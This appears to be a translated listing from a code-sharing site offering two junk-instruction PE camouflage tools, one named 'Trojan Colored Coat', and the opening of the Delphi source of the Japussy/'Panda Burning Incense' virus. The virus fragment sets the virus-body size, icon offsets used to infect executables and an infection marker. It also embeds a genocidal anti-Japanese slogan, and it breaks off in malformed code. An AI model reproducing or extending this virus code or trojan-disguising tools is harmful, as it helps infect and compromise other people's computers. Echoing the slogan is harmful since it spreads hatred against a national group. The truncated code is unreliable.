Description: A simple junk-instruction camouflage tool -- Delphi edition of "Trojan Colored Coat" (木马彩衣)
Notes:
I had some idle time these past two days and studied the PE structure. Following fi7ke's article "PE camouflage tool [junk-instruction adder]" (http://forum.wrsky.com/viewthread.php?tid=1927&fpage=1), I wrote a simple junk-instruction camouflage tool. Because I only have a limited set of junk instructions on hand, it currently supports only four camouflage formats. It supports a custom section name and size. It does not currently support repeated packing by the tool itself, but other packers can be used on the result. The minimum section size is 512 bytes. I hope others will keep improving it, contribute more junk instructions, and add the ability to pack repeatedly with the tool itself.
Platform: |
Size: 19456 |
Author:tom |
Hits:
Description: Uses junk instructions to confuse crackers, thereby protecting the software.
This tool lets you define your own junk instructions and has three modes:
1. Insert junk instructions at random
2. Insert a specified, fixed junk instruction
3. Insert all junk instructions
Usage:
1. Add your junk instructions to the JunkData.mdb database yourself
2. Write {$F Junk} wherever you want junk instructions placed
3. {$F Junk} is the junk-instruction marker
4. After processing with this tool, recompile.
Platform: |
Size: 711680 |
Author:长毛 |
Hits:
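Description:
Panda Burning Incense (熊猫烧香) original code
Panda Burning Incense, hexadecimal, Windows, source code, string
Panda Burning Incense source code
program Japussy
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}
const
HeaderSize = 82432 //Size of the virus body
IconOffset = EB8 //Offset of the PE file's main icon
//Size obtained when compiled on my Delphi5 SP1; other Delphi versions may differ
//Searching for the hex string 2800000020 locates the main icon's offset
{
HeaderSize = 38912 //Size of the virus body after UPX compression
IconOffset = BC //Offset of the main icon in the UPX-compressed PE file
//Upx 1.24W usage: upx -9 --8086 Japussy.exe
}
IconSize = E8 //Size of the PE file's main icon -- 744 bytes
IconTail = IconOffset + IconSize //End of the PE file's main icon
ID = 444444 //Infection marker
//Junk code, kept ready for writing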
Catchword = If a race need to be killed out, it must be Yamato. +
If a country need to be destroyed, it must be Japan! +
***
{$R *.RES}
function : Integer): Integer
Platform: |
Size: 4096 |
Author:炎热 |
Hits: